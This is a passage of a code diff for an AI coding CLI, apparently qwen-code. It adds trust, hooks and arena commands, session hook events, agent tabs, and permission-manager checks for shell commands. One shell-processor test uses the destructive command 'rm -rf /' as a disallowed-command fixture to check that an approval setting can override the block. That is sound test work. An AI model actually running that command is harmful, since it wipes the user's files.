a/packages/cli/src/services/BuiltinCommandLoader.test.ts +++ b/packages/cli/src/services/BuiltinCommandLoader.test.ts @@ -37,12 +37,33 @@ vi.mock('../ui/commands/ideCommand.js', async () => { vi.mock('../ui/commands/restoreCommand.js', () => ({ restoreCommand: vi.fn(), })); +vi.mock('../ui/commands/trustCommand.js', async () => { + const { CommandKind } = await import('../ui/commands/types.js'); + return { + trustCommand: { + name: 'trust', + description: 'Trust command', + kind: CommandKind.BUILT_IN, + }, + }; +}); vi.mock('../ui/commands/permissionsCommand.js', async () => { const { CommandKind } = await import('../ui/commands/types.js'); return { permissionsCommand: { name: 'permissions', - description: 'Permissions command', + description: 'Manage permission rules', + kind: CommandKind.BUILT_IN, + }, + }; +}); + +vi.mock('../ui/commands/hooksCommand.js', async () => { + const { CommandKind } = await import('../ui/commands/types.js'); + return { + hooksCommand: { + name: 'hooks', + description: 'Hooks command', kind: CommandKind.BUILT_IN, }, }; @@ -100,6 +121,7 @@ describe('BuiltinCommandLoader', () => { mockConfig = { getFolderTrust: vi.fn().mockReturnValue(true), getUseModelRouter: () => false, + getEnableHooks: vi.fn().mockReturnValue(true), } as unknown as Config; restoreCommandMock.mockReturnValue({ @@ -162,19 +184,19 @@ describe('BuiltinCommandLoader', () => { expect(modelCmd).toBeDefined(); }); - it('should include permissions command when folder trust is enabled', async () => { + it('should include trust command when folder trust is enabled', async () => { const loader = new BuiltinCommandLoader(mockConfig); const commands = await loader.loadCommands(new AbortController().signal); - const permissionsCmd = commands.find((c) => c.name === 'permissions'); - expect(permissionsCmd).toBeDefined(); + const trustCmd = commands.find((c) => c.name === 'trust'); + expect(trustCmd).toBeDefined(); }); - it('should exclude permissions command when folder trust is disabled', async () => { + it('should exclude trust command when folder trust is disabled', async () => { (mockConfig.getFolderTrust as Mock).mockReturnValue(false); const loader = new BuiltinCommandLoader(mockConfig); const commands = await loader.loadCommands(new AbortController().signal); - const permissionsCmd = commands.find((c) => c.name === 'permissions'); - expect(permissionsCmd).toBeUndefined(); + const trustCmd = commands.find((c) => c.name === 'trust'); + expect(trustCmd).toBeUndefined(); }); it('should always include modelCommand', async () => { @@ -184,4 +206,19 @@ describe('BuiltinCommandLoader', () => { expect(modelCmd).toBeDefined(); expect(modelCmd?.name).toBe('model'); }); + + it('should include hooks command when enableHooks is true', async () => { + const loader = new BuiltinCommandLoader(mockConfig); + const commands = await loader.loadCommands(new AbortController().signal); + const hooksCmd = commands.find((c) => c.name === 'hooks'); + expect(hooksCmd).toBeDefined(); + }); + + it('should exclude hooks command when enableHooks is false', async () => { + (mockConfig.getEnableHooks as Mock).mockReturnValue(false); + const loader = new BuiltinCommandLoader(mockConfig); + const commands = await loader.loadCommands(new AbortController().signal); + const hooksCmd = commands.find((c) => c.name === 'hooks'); + expect(hooksCmd).toBeUndefined(); + }); }); diff --git a/packages/cli/src/services/BuiltinCommandLoader.ts b/packages/cli/src/services/BuiltinCommandLoader.ts index 4f198fb0f..f379a39de 100644 --- a/packages/cli/src/services/BuiltinCommandLoader.ts +++ b/packages/cli/src/services/BuiltinCommandLoader.ts @@ -9,12 +9,14 @@ import type { SlashCommand } from '../ui/commands/types.js'; import type { Config } from '@qwen-code/qwen-code-core'; import { aboutCommand } from '../ui/commands/aboutCommand.js'; import { agentsCommand } from '../ui/commands/agentsCommand.js'; +import { arenaCommand } from '../ui/commands/arenaCommand.js'; import { approvalModeCommand } from '../ui/commands/approvalModeCommand.js'; import { authCommand } from '../ui/commands/authCommand.js'; import { btwCommand } from '../ui/commands/btwCommand.js'; import { bugCommand } from '../ui/commands/bugCommand.js'; import { clearCommand } from '../ui/commands/clearCommand.js'; import { compressCommand } from '../ui/commands/compressCommand.js'; +import { contextCommand } from '../ui/commands/contextCommand.js'; import { copyCommand } from '../ui/commands/copyCommand.js'; import { docsCommand } from '../ui/commands/docsCommand.js'; import { directoryCommand } from '../ui/commands/directoryCommand.js'; @@ -30,6 +32,7 @@ import { mcpCommand } from '../ui/commands/mcpCommand.js'; import { memoryCommand } from '../ui/commands/memoryCommand.js'; import { modelCommand } from '../ui/commands/modelCommand.js'; import { permissionsCommand } from '../ui/commands/permissionsCommand.js'; +import { trustCommand } from '../ui/commands/trustCommand.js'; import { quitCommand } from '../ui/commands/quitCommand.js'; import { restoreCommand } from '../ui/commands/restoreCommand.js'; import { resumeCommand } from '../ui/commands/resumeCommand.js'; @@ -62,12 +65,14 @@ export class BuiltinCommandLoader implements ICommandLoader { const allDefinitions: Array = [ aboutCommand, agentsCommand, + arenaCommand, approvalModeCommand, authCommand, btwCommand, bugCommand, clearCommand, compressCommand, + contextCommand, copyCommand, docsCommand, directoryCommand, @@ -75,14 +80,15 @@ export class BuiltinCommandLoader implements ICommandLoader { exportCommand, extensionsCommand, helpCommand, - hooksCommand, + ...(this.config?.getEnableHooks() ? [hooksCommand] : []), await ideCommand(), initCommand, languageCommand, mcpCommand, memoryCommand, modelCommand, - ...(this.config?.getFolderTrust() ? [permissionsCommand] : []), + permissionsCommand, + ...(this.config?.getFolderTrust() ? [trustCommand] : []), quitCommand, restoreCommand(this.config), resumeCommand, diff --git a/packages/cli/src/services/insight/generators/DataProcessor.test.ts b/packages/cli/src/services/insight/generators/DataProcessor.test.ts index 1f90dbff5..4b78cf1bb 100644 --- a/packages/cli/src/services/insight/generators/DataProcessor.test.ts +++ b/packages/cli/src/services/insight/generators/DataProcessor.test.ts @@ -24,6 +24,7 @@ vi.mock('@qwen-code/qwen-code-core', async () => { info: vi.fn(), error: vi.fn(), warn: vi.fn(), + debug: vi.fn(), })), }; }); @@ -1137,6 +1138,102 @@ describe('DataProcessor', () => { }); }); + describe('generateQualitativeInsights', () => { + const mockMetrics = { + totalSessions: 5, + totalMessages: 50, + totalHours: 2, + heatmap: { '2025-01-15': 3 }, + topTools: [['read_file', 10]] as Array<[string, number]>, + activeDays: 1, + activeHours: { '10': 5 }, + totalLinesAdded: 100, + totalLinesRemoved: 50, + totalFiles: 10, + streak: { currentStreak: 1, longestStreak: 1, dates: [] }, + } as unknown as Omit; + + const mockFacets: SessionFacets[] = [ + { + session_id: 'test-1', + underlying_goal: 'Fix bug', + goal_categories: { debugging: 1 }, + outcome: 'fully_achieved', + user_satisfaction_counts: { satisfied: 1 }, + Qwen_helpfulness: 'very_helpful', + session_type: 'single_task', + friction_counts: {}, + friction_detail: '', + primary_success: 'correct_code_edits', + brief_summary: 'Fixed a bug', + }, + ]; + + it('should return partial qualitative data when some LLM calls fail', async () => { + let callIndex = 0; + mockGenerateJson.mockImplementation(() => { + callIndex++; + if (callIndex % 2 === 0) { + return Promise.reject(new Error('LLM timeout')); + } + return Promise.resolve({ intro: 'test', areas: [], opportunities: [] }); + }); + + const result = await ( + dataProcessor as unknown as { + generateQualitativeInsights( + metrics: Omit, + facets: SessionFacets[], + ): Promise< + | import('../types/QualitativeInsightTypes.js').QualitativeInsights + | undefined + >; + } + ).generateQualitativeInsights(mockMetrics, mockFacets); + + expect(result).toBeDefined(); + expect(result!.impressiveWorkflows).toBeDefined(); + expect(result!.projectAreas).toBeUndefined(); + expect(result!.futureOpportunities).toBeDefined(); + expect(result!.frictionPoints).toBeUndefined(); + }); + + it('should return undefined when facets are empty', async () => { + const result = await ( + dataProcessor as unknown as { + generateQualitativeInsights( + metrics: Omit, + facets: SessionFacets[], + ): Promise< + | import('../types/QualitativeInsightTypes.js').QualitativeInsights + | undefined + >; + } + ).generateQualitativeInsights(mockMetrics, []); + + expect(result).toBeUndefined(); + }); + + it('should return full qualitative data when all LLM calls succeed', async () => { + mockGenerateJson.mockResolvedValue({ intro: 'test', areas: [] }); + + const result = await ( + dataProcessor as unknown as { + generateQualitativeInsights( + metrics: Omit, + facets: SessionFacets[], + ): Promise< + | import('../types/QualitativeInsightTypes.js').QualitativeInsights + | undefined + >; + } + ).generateQualitativeInsights(mockMetrics, mockFacets); + + expect(result).toBeDefined(); + expect(mockGenerateJson).toHaveBeenCalledTimes(8); + }); + }); + describe('generateFacets', () => { it('should skip non-conversational sessions', async () => { const userOnlyRecords: ChatRecord[] = [ diff --git a/packages/cli/src/services/insight/generators/DataProcessor.ts b/packages/cli/src/services/insight/generators/DataProcessor.ts index a3cda424e..c77e28a49 100644 --- a/packages/cli/src/services/insight/generators/DataProcessor.ts +++ b/packages/cli/src/services/insight/generators/DataProcessor.ts @@ -388,7 +388,7 @@ export class DataProcessor { const generate = async ( promptTemplate: string, schema: Record, - ): Promise => { + ): Promise => { const prompt = `${promptTemplate}\n\n${commonData}`; try { const result = await this.config.getBaseLlmClient().generateJson({ @@ -400,7 +400,7 @@ export class DataProcessor { return result as T; } catch (error) { logger.error('Failed to generate insight:', error); - throw error; + return undefined; } }; diff --git a/packages/cli/src/services/insight/types/QualitativeInsightTypes.ts b/packages/cli/src/services/insight/types/QualitativeInsightTypes.ts index fc9546b98..aa9bea169 100644 --- a/packages/cli/src/services/insight/types/QualitativeInsightTypes.ts +++ b/packages/cli/src/services/insight/types/QualitativeInsightTypes.ts @@ -71,12 +71,12 @@ export interface InsightAtAGlance { } export interface QualitativeInsights { - impressiveWorkflows: InsightImpressiveWorkflows; - projectAreas: InsightProjectAreas; - futureOpportunities: InsightFutureOpportunities; - frictionPoints: InsightFrictionPoints; - memorableMoment: InsightMemorableMoment; - improvements: InsightImprovements; - interactionStyle: InsightInteractionStyle; - atAGlance: InsightAtAGlance; + impressiveWorkflows?: InsightImpressiveWorkflows; + projectAreas?: InsightProjectAreas; + futureOpportunities?: InsightFutureOpportunities; + frictionPoints?: InsightFrictionPoints; + memorableMoment?: InsightMemorableMoment; + improvements?: InsightImprovements; + interactionStyle?: InsightInteractionStyle; + atAGlance?: InsightAtAGlance; } diff --git a/packages/cli/src/services/prompt-processors/shellProcessor.test.ts b/packages/cli/src/services/prompt-processors/shellProcessor.test.ts index 151faf324..fa2afe4fd 100644 --- a/packages/cli/src/services/prompt-processors/shellProcessor.test.ts +++ b/packages/cli/src/services/prompt-processors/shellProcessor.test.ts @@ -72,7 +72,9 @@ describe('ShellProcessor', () => { getApprovalMode: vi.fn().mockReturnValue(ApprovalMode.DEFAULT), getShouldUseNodePtyShell: vi.fn().mockReturnValue(false), getShellExecutionConfig: vi.fn().mockReturnValue({}), - getAllowedTools: vi.fn().mockReturnValue([]), + getPermissionsAllow: vi.fn().mockReturnValue([]), + // Default: no permission manager (tests that need one set it explicitly) + getPermissionManager: vi.fn().mockReturnValue(null), }; context = createMockCommandContext({ @@ -206,9 +208,11 @@ describe('ShellProcessor', () => { allAllowed: false, disallowedCommands: ['rm -rf /'], }); - (mockConfig.getAllowedTools as Mock).mockReturnValue([ - 'ShellTool(rm -rf /)', - ]); + // Simulate allowedTools being pre-merged into permissionsAllow by Config, + // so PermissionManager returns 'allow' for this command. + (mockConfig.getPermissionManager as Mock).mockReturnValue({ + isCommandAllowed: (_cmd: string) => 'allow', + }); mockShellExecute.mockReturnValue({ result: Promise.resolve({ ...SUCCESS_RESULT, output: 'deleted' }), }); diff --git a/packages/cli/src/services/prompt-processors/shellProcessor.ts b/packages/cli/src/services/prompt-processors/shellProcessor.ts index 2a6df7161..187b98460 100644 --- a/packages/cli/src/services/prompt-processors/shellProcessor.ts +++ b/packages/cli/src/services/prompt-processors/shellProcessor.ts @@ -7,13 +7,11 @@ import { ApprovalMode, checkCommandPermissions, - doesToolInvocationMatch, escapeShellArg, getShellConfiguration, ShellExecutionService, flatMapTextParts, } from '@qwen-code/qwen-code-core'; -import type { AnyToolInvocation } from '@qwen-code/qwen-code-core'; import type { CommandContext } from '../../ui/commands/types.js'; import type { IPromptProcessor, PromptPipelineContent } from './types.js'; @@ -109,10 +107,9 @@ export class ShellProcessor implements IPromptProcessor { return { ...injection, resolvedCommand: undefined }; } - const resolvedCommand = command.replaceAll( - SHORTHAND_ARGS_PLACEHOLDER, - userArgsEscaped, - ); + const resolvedCommand = command + .replaceAll(SHORTHAND_ARGS_PLACEHOLDER, userArgsEscaped) // Replace {{args}} + .replaceAll('$ARGUMENTS', userArgsEscaped); // Replace $ARGUMENTS return { ...injection, resolvedCommand }; }, ); @@ -126,15 +123,12 @@ export class ShellProcessor implements IPromptProcessor { // Security check on the final, escaped command string. const { allAllowed, disallowedCommands, blockReason, isHardDenial } = checkCommandPermissions(command, config, sessionShellAllowlist); - const allowedTools = config.getAllowedTools() || []; - const invocation = { - params: { command }, - } as AnyToolInvocation; - const isAllowedBySettings = doesToolInvocationMatch( - 'run_shell_command', - invocation, - allowedTools, - ); + + // Determine if this command is explicitly auto-approved via PermissionManager + const pm = config.getPermissionManager?.(); + const isAllowedBySettings = pm + ? pm.isCommandAllowed(command) === 'allow' + : false; if (!allAllowed) { if (isHardDenial) { diff --git a/packages/cli/src/ui/App.test.tsx b/packages/cli/src/ui/App.test.tsx index be09fe52f..8df422f4b 100644 --- a/packages/cli/src/ui/App.test.tsx +++ b/packages/cli/src/ui/App.test.tsx @@ -9,6 +9,11 @@ import { render } from 'ink-testing-library'; import { Text, useIsScreenReaderEnabled } from 'ink'; import { App } from './App.js'; import { UIStateContext, type UIState } from './contexts/UIStateContext.js'; +import { + UIActionsContext, + type UIActions, +} from './contexts/UIActionsContext.js'; +import { AgentViewProvider } from './contexts/AgentViewContext.js'; import { StreamingState } from './types.js'; vi.mock('ink', async (importOriginal) => { @@ -43,6 +48,10 @@ vi.mock('./components/Footer.js', () => ({ Footer: () => Footer, })); +vi.mock('./components/agent-view/AgentTabBar.js', () => ({ + AgentTabBar: () => null, +})); + describe('App', () => { const mockUIState: Partial = { streamingState: StreamingState.Idle, @@ -58,13 +67,24 @@ describe('App', () => { }, }; - it('should render main content and composer when not quitting', () => { - const { lastFrame } = render( - - - , + const mockUIActions = { + refreshStatic: vi.fn(), + } as unknown as UIActions; + + const renderWithProviders = (uiState: UIState) => + render( + + + + + + + , ); + it('should render main content and composer when not quitting', () => { + const { lastFrame } = renderWithProviders(mockUIState as UIState); + expect(lastFrame()).toContain('MainContent'); expect(lastFrame()).toContain('Composer'); }); @@ -75,11 +95,7 @@ describe('App', () => { quittingMessages: [{ id: 1, type: 'user', text: 'test' }], } as UIState; - const { lastFrame } = render( - - - , - ); + const { lastFrame } = renderWithProviders(quittingUIState); expect(lastFrame()).toContain('Quitting...'); }); @@ -90,11 +106,7 @@ describe('App', () => { dialogsVisible: true, } as UIState; - const { lastFrame } = render( - - - , - ); + const { lastFrame } = renderWithProviders(dialogUIState); expect(lastFrame()).toContain('MainContent'); expect(lastFrame()).toContain('DialogManager'); @@ -107,11 +119,7 @@ describe('App', () => { ctrlCPressedOnce: true, } as UIState; - const { lastFrame } = render( - - - , - ); + const { lastFrame } = renderWithProviders(ctrlCUIState); expect(lastFrame()).toContain('Press Ctrl+C again to exit.'); }); @@ -123,11 +131,7 @@ describe('App', () => { ctrlDPressedOnce: true, } as UIState; - const { lastFrame } = render( - - - , - ); + const { lastFrame } = renderWithProviders(ctrlDUIState); expect(lastFrame()).toContain('Press Ctrl+D again to exit.'); }); @@ -135,11 +139,7 @@ describe('App', () => { it('should render ScreenReaderAppLayout when screen reader is enabled', () => { (useIsScreenReaderEnabled as vi.Mock).mockReturnValue(true); - const { lastFrame } = render( - - - , - ); + const { lastFrame } = renderWithProviders(mockUIState as UIState); expect(lastFrame()).toContain( 'Notifications\nFooter\nMainContent\nComposer', @@ -149,11 +149,7 @@ describe('App', () => { it('should render DefaultAppLayout when screen reader is not enabled', () => { (useIsScreenReaderEnabled as vi.Mock).mockReturnValue(false); - const { lastFrame } = render( - - - , - ); + const { lastFrame } = renderWithProviders(mockUIState as UIState); expect(lastFrame()).toContain('MainContent\nComposer'); }); diff --git a/packages/cli/src/ui/AppContainer.test.tsx b/packages/cli/src/ui/AppContainer.test.tsx index 5601fc836..0057103f5 100644 --- a/packages/cli/src/ui/AppContainer.test.tsx +++ b/packages/cli/src/ui/AppContainer.test.tsx @@ -78,6 +78,21 @@ vi.mock('./hooks/useAutoAcceptIndicator.js'); vi.mock('./hooks/useGitBranchName.js'); vi.mock('./contexts/VimModeContext.js'); vi.mock('./contexts/SessionContext.js'); +vi.mock('./contexts/AgentViewContext.js', () => ({ + useAgentViewState: vi.fn(() => ({ + activeView: 'main', + agents: new Map(), + })), + useAgentViewActions: vi.fn(() => ({ + switchToMain: vi.fn(), + switchToAgent: vi.fn(), + switchToNext: vi.fn(), + switchToPrevious: vi.fn(), + registerAgent: vi.fn(), + unregisterAgent: vi.fn(), + unregisterAll: vi.fn(), + })), +})); vi.mock('./components/shared/text-buffer.js'); vi.mock('./hooks/useLogger.js'); @@ -268,7 +283,7 @@ describe('AppContainer State Management', () => { listSubagents: vi.fn().mockResolvedValue([]), addChangeListener: vi.fn(), loadSubagent: vi.fn(), - createSubagentScope: vi.fn(), + createSubagent: vi.fn(), }; vi.spyOn(mockConfig, 'getSubagentManager').mockReturnValue( mockSubagentManager as SubagentManager, diff --git a/packages/cli/src/ui/AppContainer.tsx b/packages/cli/src/ui/AppContainer.tsx index e5f83ed4b..75b937ffd 100644 --- a/packages/cli/src/ui/AppContainer.tsx +++ b/packages/cli/src/ui/AppContainer.tsx @@ -39,6 +39,8 @@ import { getAllGeminiMdFilenames, ShellExecutionService, Storage, + SessionEndReason, + SessionStartSource, } from '@qwen-code/qwen-code-core'; import { buildResumedHistoryItems } from './utils/resumeHistoryUtils.js'; import { validateAuthMethod } from '../config/auth.js'; @@ -52,6 +54,7 @@ import { useAuthCommand } from './auth/useAuth.js'; import { useEditorSettings } from './hooks/useEditorSettings.js'; import { useSettingsCommand } from './hooks/useSettingsCommand.js'; import { useModelCommand } from './hooks/useModelCommand.js'; +import { useArenaCommand } from './hooks/useArenaCommand.js'; import { useApprovalModeCommand } from './hooks/useApprovalModeCommand.js'; import { useResumeCommand } from './hooks/useResumeCommand.js'; import { useSlashCommandProcessor } from './hooks/slashCommandProcessor.js'; @@ -97,6 +100,7 @@ import { } from './hooks/useExtensionUpdates.js'; import { useCodingPlanUpdates } from './hooks/useCodingPlanUpdates.js'; import { ShellFocusContext } from './contexts/ShellFocusContext.js'; +import { useAgentViewState } from './contexts/AgentViewContext.js'; import { t } from '../i18n/index.js'; import { useWelcomeBack } from './hooks/useWelcomeBack.js'; import { useDialogClose } from './hooks/useDialogClose.js'; @@ -237,6 +241,10 @@ export const AppContainer = (props: AppContainerProps) => { const { codingPlanUpdateRequest, dismissCodingPlanUpdate } = useCodingPlanUpdates(settings, config, historyManager.addItem); + const [isTrustDialogOpen, setTrustDialogOpen] = useState(false); + const openTrustDialog = useCallback(() => setTrustDialogOpen(true), []); + const closeTrustDialog = useCallback(() => setTrustDialogOpen(false), []); + const [isPermissionsDialogOpen, setPermissionsDialogOpen] = useState(false); const openPermissionsDialog = useCallback( () => setPermissionsDialogOpen(true), @@ -290,7 +298,42 @@ export const AppContainer = (props: AppContainerProps) => { ); historyManager.loadHistory(historyItems); } + + // Fire SessionStart event after config is initialized + const sessionStartSource = resumedSessionData + ? SessionStartSource.Resume + : SessionStartSource.Startup; + + const hookSystem = config.getHookSystem(); + + if (hookSystem) { + hookSystem + .fireSessionStartEvent(sessionStartSource, config.getModel() ?? '') + .then(() => { + debugLogger.debug('SessionStart event completed successfully'); + }) + .catch((err) => { + debugLogger.warn(`SessionStart hook failed: ${err}`); + }); + } else { + debugLogger.debug( + 'SessionStart: HookSystem not available, skipping event', + ); + } })(); + + // Register SessionEnd cleanup for process exit + registerCleanup(async () => { + try { + await config + .getHookSystem() + ?.fireSessionEndEvent(SessionEndReason.PromptInputExit); + debugLogger.debug('SessionEnd event completed successfully!!!'); + } catch (err) { + debugLogger.error(`SessionEnd hook failed: ${err}`); + } + }); + registerCleanup(async () => { const ideClient = await IdeClient.getInstance(); await ideClient.disconnect(); @@ -471,6 +514,8 @@ export const AppContainer = (props: AppContainerProps) => { const { isModelDialogOpen, openModelDialog, closeModelDialog } = useModelCommand(); + const { activeArenaDialog, openArenaDialog, closeArenaDialog } = + useArenaCommand(); const { isResumeDialogOpen, @@ -510,6 +555,8 @@ export const AppContainer = (props: AppContainerProps) => { openEditorDialog, openSettingsDialog, openModelDialog, + openTrustDialog, + openArenaDialog, openPermissionsDialog, openApprovalModeDialog, quit: (messages: HistoryItem[]) => { @@ -534,8 +581,10 @@ export const AppContainer = (props: AppContainerProps) => { openEditorDialog, openSettingsDialog, openModelDialog, + openArenaDialog, setDebugMessage, dispatchExtensionStateUpdate, + openTrustDialog, openPermissionsDialog, openApprovalModeDialog, addConfirmUpdateExtensionRequest, @@ -673,12 +722,15 @@ export const AppContainer = (props: AppContainerProps) => { // Track whether suggestions are visible for Tab key handling const [hasSuggestionsVisible, setHasSuggestionsVisible] = useState(false); - // Auto-accept indicator + const agentViewState = useAgentViewState(); + + // Auto-accept indicator — disabled on agent tabs (agents handle their own) const showAutoAcceptIndicator = useAutoAcceptIndicator({ config, addItem: historyManager.addItem, onApprovalModeChange: handleApprovalModeChange, shouldBlockTab: () => hasSuggestionsVisible, + disabled: agentViewState.activeView !== 'main', }); const { messageQueue, addMessage, clearQueue, getQueuedMessagesText } = @@ -691,6 +743,14 @@ export const AppContainer = (props: AppContainerProps) => { // Callback for handling final submit (must be after addMessage from useMessageQueue) const handleFinalSubmit = useCallback( (submittedValue: string) => { + // Route to active in-process agent if viewing a sub-agent tab. + if (agentViewState.activeView !== 'main') { + const agent = agentViewState.agents.get(agentViewState.activeView); + if (agent) { + agent.interactiveAgent.enqueueMessage(submittedValue.trim()); + return; + } + } if ( streamingState === StreamingState.Responding && isBtwCommand(submittedValue) @@ -700,7 +760,16 @@ export const AppContainer = (props: AppContainerProps) => { } addMessage(submittedValue); }, - [addMessage, streamingState, submitQuery], + [addMessage, agentViewState, streamingState, submitQuery], + ); + + const handleArenaModelsSelected = useCallback( + (models: string[]) => { + const value = models.join(','); + buffer.setText(`/arena start --models ${value} `); + closeArenaDialog(); + }, + [buffer, closeArenaDialog], ); // Welcome back functionality (must be after handleFinalSubmit) @@ -776,10 +845,17 @@ export const AppContainer = (props: AppContainerProps) => { } }, [buffer, terminalWidth, terminalHeight]); - // Compute available terminal height based on controls measurement + // agentViewState is declared earlier (before handleFinalSubmit) so it + // is available for input routing. Referenced here for layout computation. + + // Compute available terminal height based on controls measurement. + // When in-process agents are present the AgentTabBar renders an extra + // row at the top of the layout; subtract it so downstream consumers + // (shell, transcript, etc.) don't overestimate available space. + const tabBarHeight = agentViewState.agents.size > 0 ? 1 : 0; const availableTerminalHeight = Math.max( 0, - terminalHeight - controlsHeight - staticExtraHeight - 2, + terminalHeight - controlsHeight - staticExtraHeight - 2 - tabBarHeight, ); config.setShellExecutionConfig({ @@ -1033,16 +1109,23 @@ export const AppContainer = (props: AppContainerProps) => { [historyManager, setShowCommandMigrationNudge, config.storage], ); - const { elapsedTime, currentLoadingPhrase } = useLoadingIndicator( - streamingState, - settings.merged.ui?.customWittyPhrases, - ); + const currentCandidatesTokens = Object.values( + sessionStats.metrics?.models ?? {}, + ).reduce((acc, model) => acc + (model.tokens?.candidates ?? 0), 0); + + const { elapsedTime, currentLoadingPhrase, taskStartTokens } = + useLoadingIndicator( + streamingState, + settings.merged.ui?.customWittyPhrases, + currentCandidatesTokens, + ); useAttentionNotifications({ isFocused, streamingState, elapsedTime, settings, + config, }); // Dialog close functionality @@ -1058,6 +1141,8 @@ export const AppContainer = (props: AppContainerProps) => { exitEditorDialog, isSettingsDialogOpen, closeSettingsDialog, + activeArenaDialog, + closeArenaDialog, isFolderTrustDialogOpen, showWelcomeBackDialog, handleWelcomeBackClose, @@ -1332,6 +1417,8 @@ export const AppContainer = (props: AppContainerProps) => { isThemeDialogOpen || isSettingsDialogOpen || isModelDialogOpen || + isTrustDialogOpen || + activeArenaDialog !== null || isPermissionsDialogOpen || isAuthDialogOpen || isAuthenticating || @@ -1382,6 +1469,8 @@ export const AppContainer = (props: AppContainerProps) => { quittingMessages, isSettingsDialogOpen, isModelDialogOpen, + isTrustDialogOpen, + activeArenaDialog, isPermissionsDialogOpen, isApprovalModeDialogOpen, isResumeDialogOpen, @@ -1461,6 +1550,8 @@ export const AppContainer = (props: AppContainerProps) => { isMcpDialogOpen, // Feedback dialog isFeedbackDialogOpen, + // Per-task token tracking + taskStartTokens, }), [ isThemeDialogOpen, @@ -1478,6 +1569,8 @@ export const AppContainer = (props: AppContainerProps) => { quittingMessages, isSettingsDialogOpen, isModelDialogOpen, + isTrustDialogOpen, + activeArenaDialog, isPermissionsDialogOpen, isApprovalModeDialogOpen, isResumeDialogOpen, @@ -1558,6 +1651,8 @@ export const AppContainer = (props: AppContainerProps) => { isMcpDialogOpen, // Feedback dialog isFeedbackDialogOpen, + // Per-task token tracking + taskStartTokens, ], ); @@ -1577,7 +1672,11 @@ export const AppContainer = (props: AppContainerProps) => { exitEditorDialog, closeSettingsDialog, closeModelDialog, + openArenaDialog, + closeArenaDialog, + handleArenaModelsSelected, dismissCodingPlanUpdate, + closeTrustDialog, closePermissionsDialog, setShellModeActive, vimHandleInput, @@ -1626,7 +1725,11 @@ export const AppContainer = (props: AppContainerProps) => { exitEditorDialog, closeSettingsDialog, closeModelDialog, + openArenaDialog, + closeArenaDialog, + handleArenaModelsSelected, dismissCodingPlanUpdate, + closeTrustDialog, closePermissionsDialog, setShellModeActive, vimHandleInput, diff --git a/packages/cli/src/ui/commands/arenaCommand.test.ts b/packages/cli/src/ui/commands/arenaCommand.test.ts new file mode 100644 index 000000000..99f902259 --- /dev/null +++ b/packages/cli/src/ui/commands/arenaCommand.test.ts @@ -0,0 +1,395 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect, vi, beforeEach } from 'vitest'; +import { + type ArenaManager, + AgentStatus, + ArenaSessionStatus, +} from '@qwen-code/qwen-code-core'; +import { arenaCommand } from './arenaCommand.js'; +import type { + CommandContext, + OpenDialogActionReturn, + SlashCommand, +} from './types.js'; +import { createMockCommandContext } from '../../test-utils/mockCommandContext.js'; + +function getArenaSubCommand( + name: 'start' | 'stop' | 'status' | 'select', +): SlashCommand { + const command = arenaCommand.subCommands?.find((item) => item.name === name); + if (!command?.action) { + throw new Error(`Arena subcommand "${name}" is missing an action`); + } + return command; +} + +describe('arenaCommand stop subcommand', () => { + let mockContext: CommandContext; + let mockConfig: { + getArenaManager: ReturnType; + setArenaManager: ReturnType; + cleanupArenaRuntime: ReturnType; + getAgentsSettings: ReturnType; + }; + + beforeEach(() => { + mockConfig = { + getArenaManager: vi.fn(() => null), + setArenaManager: vi.fn(), + cleanupArenaRuntime: vi.fn().mockResolvedValue(undefined), + getAgentsSettings: vi.fn(() => ({})), + }; + + mockContext = createMockCommandContext({ + invocation: { + raw: '/arena stop', + name: 'arena', + args: 'stop', + }, + executionMode: 'interactive', + services: { + config: mockConfig as never, + }, + }); + }); + + it('returns an error when no arena session is running', async () => { + const stopCommand = getArenaSubCommand('stop'); + const result = await stopCommand.action!(mockContext, ''); + + expect(result).toEqual({ + type: 'message', + messageType: 'error', + content: 'No running Arena session found.', + }); + }); + + it('opens stop dialog when a running session exists', async () => { + const mockManager = { + getSessionStatus: vi.fn(() => ArenaSessionStatus.RUNNING), + } as unknown as ArenaManager; + mockConfig.getArenaManager = vi.fn(() => mockManager); + + const stopCommand = getArenaSubCommand('stop'); + const result = (await stopCommand.action!( + mockContext, + '', + )) as OpenDialogActionReturn; + + expect(result).toEqual({ + type: 'dialog', + dialog: 'arena_stop', + }); + }); + + it('opens stop dialog when a completed session exists', async () => { + const mockManager = { + getSessionStatus: vi.fn(() => ArenaSessionStatus.COMPLETED), + } as unknown as ArenaManager; + mockConfig.getArenaManager = vi.fn(() => mockManager); + + const stopCommand = getArenaSubCommand('stop'); + const result = (await stopCommand.action!( + mockContext, + '', + )) as OpenDialogActionReturn; + + expect(result).toEqual({ + type: 'dialog', + dialog: 'arena_stop', + }); + }); +}); + +describe('arenaCommand status subcommand', () => { + let mockContext: CommandContext; + let mockConfig: { + getArenaManager: ReturnType; + }; + + beforeEach(() => { + mockConfig = { + getArenaManager: vi.fn(() => null), + }; + + mockContext = createMockCommandContext({ + invocation: { + raw: '/arena status', + name: 'arena', + args: 'status', + }, + executionMode: 'interactive', + services: { + config: mockConfig as never, + }, + }); + }); + + it('returns an error when no arena session exists', async () => { + const statusCommand = getArenaSubCommand('status'); + const result = await statusCommand.action!(mockContext, ''); + + expect(result).toEqual({ + type: 'message', + messageType: 'error', + content: 'No Arena session found. Start one with /arena start.', + }); + }); + + it('opens status dialog when a session exists', async () => { + const mockManager = { + getSessionStatus: vi.fn(() => ArenaSessionStatus.RUNNING), + } as unknown as ArenaManager; + mockConfig.getArenaManager = vi.fn(() => mockManager); + + const statusCommand = getArenaSubCommand('status'); + const result = (await statusCommand.action!( + mockContext, + '', + )) as OpenDialogActionReturn; + + expect(result).toEqual({ + type: 'dialog', + dialog: 'arena_status', + }); + }); + + it('opens status dialog for completed session', async () => { + const mockManager = { + getSessionStatus: vi.fn(() => ArenaSessionStatus.COMPLETED), + } as unknown as ArenaManager; + mockConfig.getArenaManager = vi.fn(() => mockManager); + + const statusCommand = getArenaSubCommand('status'); + const result = (await statusCommand.action!( + mockContext, + '', + )) as OpenDialogActionReturn; + + expect(result).toEqual({ + type: 'dialog', + dialog: 'arena_status', + }); + }); +}); + +describe('arenaCommand select subcommand', () => { + let mockContext: CommandContext; + let mockConfig: { + getArenaManager: ReturnType; + setArenaManager: ReturnType; + cleanupArenaRuntime: ReturnType; + getAgentsSettings: ReturnType; + }; + + beforeEach(() => { + mockConfig = { + getArenaManager: vi.fn(() => null), + setArenaManager: vi.fn(), + cleanupArenaRuntime: vi.fn().mockResolvedValue(undefined), + getAgentsSettings: 